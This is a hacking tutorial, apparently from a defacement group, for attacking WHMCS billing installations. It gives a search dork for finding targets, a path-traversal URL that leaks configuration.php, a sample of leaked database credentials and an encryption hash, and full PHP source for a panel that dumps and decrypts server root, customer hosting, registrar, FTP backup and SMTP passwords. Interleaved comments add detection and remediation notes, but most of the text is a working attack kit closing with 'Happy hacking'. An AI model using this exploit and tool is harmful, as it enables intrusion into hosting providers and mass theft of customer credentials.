WHMCS হ্যাকিং

Dork :

intext:"Powered by WHMCompleteSolution"

example :
http://www.example.com/clients/index.php



expolits url :

cart.php?a=test&templatefile=../../../configuration.php

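*database info dekhar jonno (to view the database info). The request relies on `templatefile` apparently being used as a template path without validation, so the `../` sequences leave the template directory and the response contains configuration.php. In web-server logs this appears as requests to cart.php whose `templatefile` value contains `../` or `..%2F`; keeping WHMCS patched and rejecting path separators in that parameter closes it.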

https://www.example.com/clients/cart.php?a=test&templatefile=..%2F..%2F..%2Fconfiguration.php

{ full url load=unhackable /// exploit url removed=done(vulnerable ;) ) }

CTRL+U

CTRL+P

$license

/////////////////////////////// DB Info ////////////////////////////////

// Values in the form they take in a WHMCS configuration.php, shown as the output of the request above.
// Anything disclosed this way has to be treated as compromised: change the database password,
// have the license reissued, and assume every password stored encrypted under $cc_encryption_hash
// is readable, because that value is the only secret the decrypt() routine on this page needs.
$license = "Leased-7e82db0556c145de46c4";
$db_host = "localhost";
$db_username = "hmc_whmcs";
$db_password = "gqrFiO5_3&[[";
$db_name = "hmc_whmcs";
$cc_encryption_hash = "ysWaCWB1aDMlgodExRyVtx8Coc9xDpg1H32aPt1QXE13T5xhMW26k0yz2yWvN2nl";
$templates_compiledir = "templates_c/";

////////////////////////////////////////////////////////////////////////////
whmc shell

xtream.php

///// Code /////

<?
/*
*  whmcs Mangement
*  Add clients roots & client account
*
*  Analyst summary: a single-file panel that connects to a WHMCS database with
*  credentials typed in by the operator and prints server, hosting, registrar,
*  FTP-backup and SMTP credentials, decrypting them with the cc_encryption_hash.
*  It uses short open tags and the ext/mysql API (removed in PHP 7.0), which dates
*  the sample. Recognisable traits for triage: the page title "whmcs Mangement",
*  the query-string switches ?dp ?hostr00ts ?Clientsr00ts ?Clientsinfos ?domains
*  ?backup ?smtp ?logout, and cookies named host, user, pass, db, hash and login.
*/

// Output is buffered so the setcookie() calls made after HTML has been echoed can still send headers.
ob_start();
// "Logged in" is decided only by a client-supplied cookie whose value is the literal "ok";
// the script has no password or server-side session of its own.
$login = ($_COOKIE['login'] == "ok") ? true:false;
?>
<html>
<head>
<title>whmcs Mangement</title>
<style>
*{
    font-family: tahoma;
    font-size: 12px;
}
#index{
    margin: 0 150;
}
#header{
    padding: 50px;
    border:1px solid #000;
}
#navbar{
    border-left:1px solid #000;
    border-right:1px solid #000;
    border-bottom:1px solid #000;
    background:#000;
}
#navbar ul{

    list-style-type:  none;
    margin:0;
    padding: 0;
    overflow: hidden;
}
#navbar ul li{
    float:left;
}
#navbar ul li a{
  display: block ;
  text-decoration: none;
  padding: 10px;
  color:#fff;
}
#navbar ul li a:hover{
    background: #fff;
    color:  #000;
}

#content{
    padding: 10px;
    border-left:1px solid #000;
    border-right:1px solid #000;
    text-align: center;
}
#footer{
    text-align: center;
    padding: 4px;
    border:1px solid #000;
}

</style>
</head>
<body>
<div id="index">
<div id="header"><a href="?">whmcs Mangement</a></div>
<div id="navbar">
<ul>
<li><a href="?">Home</a></li>
<li><a href="?dp">Decode Pass</a></li>
<?
// The menu entries for the data views are emitted only when the login cookie check passed.
// Each entry is a bare query-string key (?hostr00ts, ?Clientsr00ts, ...), which is what
// appears in access logs when the panel is used.
if($login){
    echo '
    <li><a href="?hostr00ts">Host r00ts</a></li>
    <li><a href="?Clientsr00ts">Clients r00ts</a></li>
    <li><a href="?Clientsinfos">Clients infos</a></li>
    <li><a href="?domains">Domains</a></li>
    <li><a href="?backup">Backup Infos</a></li>
    <li><a href="?smtp">SMTP Infos</a></li>
    <li><a href="?logout">Logout</a></li>
    ';
}

?>

</ul>
</div>

<div id="content">



<?

// ?dp view: stand-alone decoder that takes one encrypted value and a cc_encryption_hash from a
// POST form and prints the decrypt() result. It sits outside the $login check, so it is
// reachable without the cookie and needs no database connection.
if(isset($_GET['dp'])){

    // The condition applies the bitwise & operator to the two posted strings.
    if($_POST[pass] & $_POST[hash]){
         echo "Decode Pass : <b>".decrypt($_POST[pass], $_POST[hash])."</b>";
    }
    // The posted values are written back into the form (and the result above) without HTML escaping.
    echo "<form action='' method='POST'>
        <table border='0' cellpadding='5' align='center'>
        <tr><td>Pass</td><td><input type='text' name='pass' value='{$_POST[pass]}'/></td></tr>
        <tr><td>CC Encryption Hash</td><td><input type='text' name='hash' value='{$_POST[hash]}'/></td></tr>
        <tr><td colspan='2' align='center'><input type='submit' value='Decode'/></td></tr>
        </table>
        </form>";

}

// Handles the "Connect" form: the operator submits the database host, user, password, schema name
// and the cc_encryption_hash, i.e. the values held in a WHMCS configuration.php.
if($_POST['ok'] == "Connect"){

    // All five fields must be non-empty before a connection is attempted.
    if(!$_POST['host'] or !$_POST['user'] or !$_POST['pass'] or !$_POST['db'] or !$_POST['hash']){
        echo "Error : Please Fill All inputs !";
    }else{

        // The credentials are checked with a live connection; '@' hides the warning on failure.
        if(@mysql_connect($_POST['host'],$_POST['user'],$_POST['pass']) && mysql_select_db($_POST['db'])){
        echo "Done : Connection Successfully
        <meta http-equiv='refresh' content='1;URL=?hostr00ts' />
        ";
        // On success every submitted value, including the database password and the encryption
        // hash, is stored in cleartext cookies, and login=ok marks the browser as authenticated.
        // Later requests therefore carry these secrets in their Cookie header, which is where
        // they can be found in proxy or WAF logs that record cookies.
        setcookie("host",$_POST['host']);
        setcookie("user",$_POST['user']);
        setcookie("pass",$_POST['pass']);
        setcookie("db",$_POST['db']);
        setcookie("hash",$_POST['hash']);
        setcookie("login","ok");
        ob_end_flush();
        }else{
            echo "Error : Check MySQL infos";
        }

    }
}

// View dispatcher. Without the login cookie and without a query string the connection form is
// shown; with the cookie, the query-string key selects which WHMCS table is dumped.
if(!$login && !$_GET){
    echo '<form action="" method="post">
          <table border="0" cellpadding="5" align="center">
          <tr><td>Host</td><td>: <input type="text" name="host" value="'.$_POST[host].'"></td></tr>
          <tr><td>user</td><td>: <input type="text" name="user" value="'.$_POST[user].'"></td></tr>
          <tr><td>pass</td><td>: <input type="text" name="pass" value="'.$_POST[pass].'"></td></tr>
          <tr><td>db</td><td>: <input type="text" name="db" value="'.$_POST[db].'"></td></tr>
          <tr><td>hash</td><td>: <input type="text" name="hash" value="'.$_POST[hash].'"></td></tr>
          <tr><td colspan="2" align="center"><input type="submit" value="Connect" name="ok"></td></tr>
          </table>
          </form>';
}elseif($login){

    // Every request reconnects to the database using the values carried in the cookies;
    // the decryption secret is likewise read from the "hash" cookie.
    mysql_connect($_COOKIE['host'] , $_COOKIE['user'] , $_COOKIE['pass']);
    mysql_select_db($_COOKIE['db']);
    $cc_encryption_hash = $_COOKIE['hash'];

    if(!$_GET){
            // Home view: the connection form again, pre-filled from the cookies.
            echo '<form action="" method="post">
          <table border="0" cellpadding="5" align="center">
          <tr><td>Host</td><td>: <input type="text" name="host" value="'.$_COOKIE[host].'"></td></tr>
          <tr><td>user</td><td>: <input type="text" name="user" value="'.$_COOKIE[user].'"></td></tr>
          <tr><td>pass</td><td>: <input type="text" name="pass" value="'.$_COOKIE[pass].'"></td></tr>
          <tr><td>db</td><td>: <input type="text" name="db" value="'.$_COOKIE[db].'"></td></tr>
          <tr><td>hash</td><td>: <input type="text" name="hash" value="'.$_COOKIE[hash].'"></td></tr>
          <tr><td colspan="2" align="center"><input type="submit" value="Connect" name="ok"></td></tr>
          </table>
          </form>';
    }elseif(isset($_GET['domains'])){

    // ?domains: reads tblregistrars and prints each registrar setting with its decrypted value
    // ("0" when decryption yields an empty result). Data at risk: domain-registrar credentials.
    $query = mysql_query("SELECT * FROM tblregistrars");

    echo "<table border='1' align='center' cellpadding='5'>
    <tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>";

    while($v = mysql_fetch_array($query)) {
    $value = (!decrypt($v['value'], $cc_encryption_hash)) ? "0":decrypt($v['value'], $cc_encryption_hash);
    echo "<tr><td>{$v['registrar']}</td><td>{$v['setting']}</td><td>$value</td></tr>" ;
    }

    echo "</table>";

    }elseif(isset($_GET['Clientsinfos'])){

    // ?Clientsinfos: reads every row of tblhosting and prints domain, username, decrypted
    // password and assigned IPs. Data at risk: all customer hosting-account passwords.
    $query = mysql_query("SELECT * FROM tblhosting");
    echo "<table border='1' cellpadding='5' align='center'>
    <tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";
    while($v = mysql_fetch_array($query)) {
    echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v['assignedips']}</td></tr>";
    }
    echo "</table>";

    }elseif(isset($_GET['Clientsr00ts'])){

    // ?Clientsr00ts: same columns as above, restricted to tblhosting rows whose username is 'root'.
    $query = mysql_query("SELECT * FROM tblhosting where username = 'root'");
    echo "<table border='1' cellpadding='5' align='center'>
    <tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";

    if(!is_array(mysql_fetch_array($query))){
        echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
    }
    while($v = mysql_fetch_array($query)) {
    echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v['assignedips']}</td></tr>";
    }
    echo "</table>";

    }elseif(isset($_GET['hostr00ts'])){
        // ?hostr00ts: reads tblservers and prints type, active flag, IP address, username and the
        // decrypted password of each server record. Data at risk: the provider's own server logins.
        $query = mysql_query("SELECT * FROM tblservers");

        echo "<table border='1' cellpadding='5' align='center'>
        <tr><td>Type</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";

        while($v = mysql_fetch_array($query)) {

        echo "<tr>
        <td>{$v['type']}</td><td>{$v['active']}</td><td>{$v['ipaddress']}</td><td>{$v['username']}</td><td>".decrypt($v['password'], $cc_encryption_hash)."</td>
        </tr>";
        }
        echo "</table>";
    }elseif(isset($_GET['backup'])){

        // ?backup: scans tblconfiguration for the four FTPBackup* settings and prints their values
        // exactly as stored (decrypt() is not called here). Data at risk: backup-server FTP login.
        $query = mysql_query("SELECT * FROM tblconfiguration where 1");

        echo "<table border='1' cellpadding='5' align='center'>";

        $wht = array('FTPBackupHostname','FTPBackupUsername','FTPBackupPassword','FTPBackupDestination');

            while($row = mysql_fetch_array($query)){

                  // After a setting is printed its slot in $wht is overwritten.
                  if($row[setting] == $wht[0]){
                        echo  "<tr><td>Hostname</td><td>{$row[value]}</td></tr>";  $wht[0] = xxx;
                  }elseif($row[setting] == $wht[1]){
                        echo  "<tr><td>Username</td><td>{$row[value]}</td></tr>";  $wht[1] = xxx;
                  }elseif($row[setting] == $wht[2]){
                        echo  "<tr><td>Password</td><td>{$row[value]}</td></tr>";  $wht[2] = xxx;
                  }elseif($row[setting] == $wht[3]){
                        echo  "<tr><td>Destination</td><td>{$row[value]}</td></tr>";  $wht[3] = xxx;
                  }
            }

        echo "</table>";

    }elseif(isset($_GET['smtp'])){

        // ?smtp: scans tblconfiguration for SMTPHost, SMTPUsername, SMTPPassword and SMTPPort and
        // prints the stored values without decryption. Data at risk: the outbound mail account.
        $query = mysql_query("SELECT * FROM tblconfiguration where 1");

        echo "<table border='1' cellpadding='5' align='center'>";

            while($row = mysql_fetch_array($query)){

                  if($row[setting] == 'SMTPHost'){
                        echo  "<tr><td>Hostname</td><td>{$row[value]}</td></tr>";
                  }elseif($row[setting] == 'SMTPUsername'){
                        echo  "<tr><td>Username</td><td>{$row[value]}</td></tr>";
                  }elseif($row[setting] == 'SMTPPassword'){
                        echo  "<tr><td>Password</td><td>{$row[value]}</td></tr>";
                  }elseif($row[setting] == 'SMTPPort'){
                        echo  "<tr><td>Port</td><td>{$row[value]}</td></tr>";
                  }
            }

        echo "</table>";

    }elseif(isset($_GET['logout'])){
        // ?logout: overwrites every cookie the browser sent with the value 0, then reloads the page.
        foreach($_COOKIE as $name=>$value){ setcookie($name,0); }
        echo "Thanks For Using Me <meta http-equiv='refresh' content='1;URL=?' />";

    }

}

?>
</div>

<div id="footer">https://facebook.com/breakthes3c</div>
</div>
</body>
</html>
<?
    /**
     * Reverses the password encryption used for the database fields read elsewhere in this script.
     *
     * The scheme is an XOR stream whose keystream is derived only from $cc_encryption_hash:
     * no per-installation secret other than that value is involved and nothing authenticates
     * the ciphertext. For a defender this is the reason a disclosed configuration.php combined
     * with database read access exposes every stored password.
     *
     * @param string $string             Base64 text as stored in the database column.
     * @param string $cc_encryption_hash The secret from configuration.php.
     * @return string The recovered plaintext (empty when the input carries no payload bytes).
     */
    function decrypt ($string,$cc_encryption_hash)
{
    // Master key material: md5(md5(secret)) followed by md5(secret), then digested by _hash().
    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    // Block size equals the raw digest length returned by _hash() (20 bytes when sha1 is used).
    $hash_length = strlen ($hash_key);
    $string = base64_decode ($string);
    // The first block of the decoded data is a masked IV; the rest is the ciphertext.
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    // Unmask the IV by XORing it with the digest of the master key.
    while ($c < $hash_length)
    {
        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
        ++$c;
    }

    // The unmasked IV is the keystream for the first ciphertext block.
    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
        // At each block boundary the next keystream block is the digest of the previous
        // keystream block concatenated with the plaintext block just recovered.
        if (($c != 0 AND $c % $hash_length == 0))
        {
            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
        }

        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
        ++$c;
    }

    return $out;
}


/**
 * Returns the digest of $string as raw bytes rather than hex text.
 *
 * sha1 is used when the function exists, md5 otherwise; the hex digest is then converted
 * two characters at a time into single bytes, so the result is half the hex length.
 *
 * @param string $string Data to digest.
 * @return string Raw binary digest.
 */
function _hash ($string)
{
    $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
    $out = '';
    $c = 0;
    // Each pair of hex digits becomes one output byte.
    while ($c < strlen ($hash))
    {
        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
        $c += 2;
    }
    return $out;
}
?>

////////////////////////////////////////////// code end ////////////////////////////////////////

site to find ip : http://www.selfseo.com/find_ip_address_of_a_website.php

find out the target site ip & replace with host.....

Happy hacking .... ;)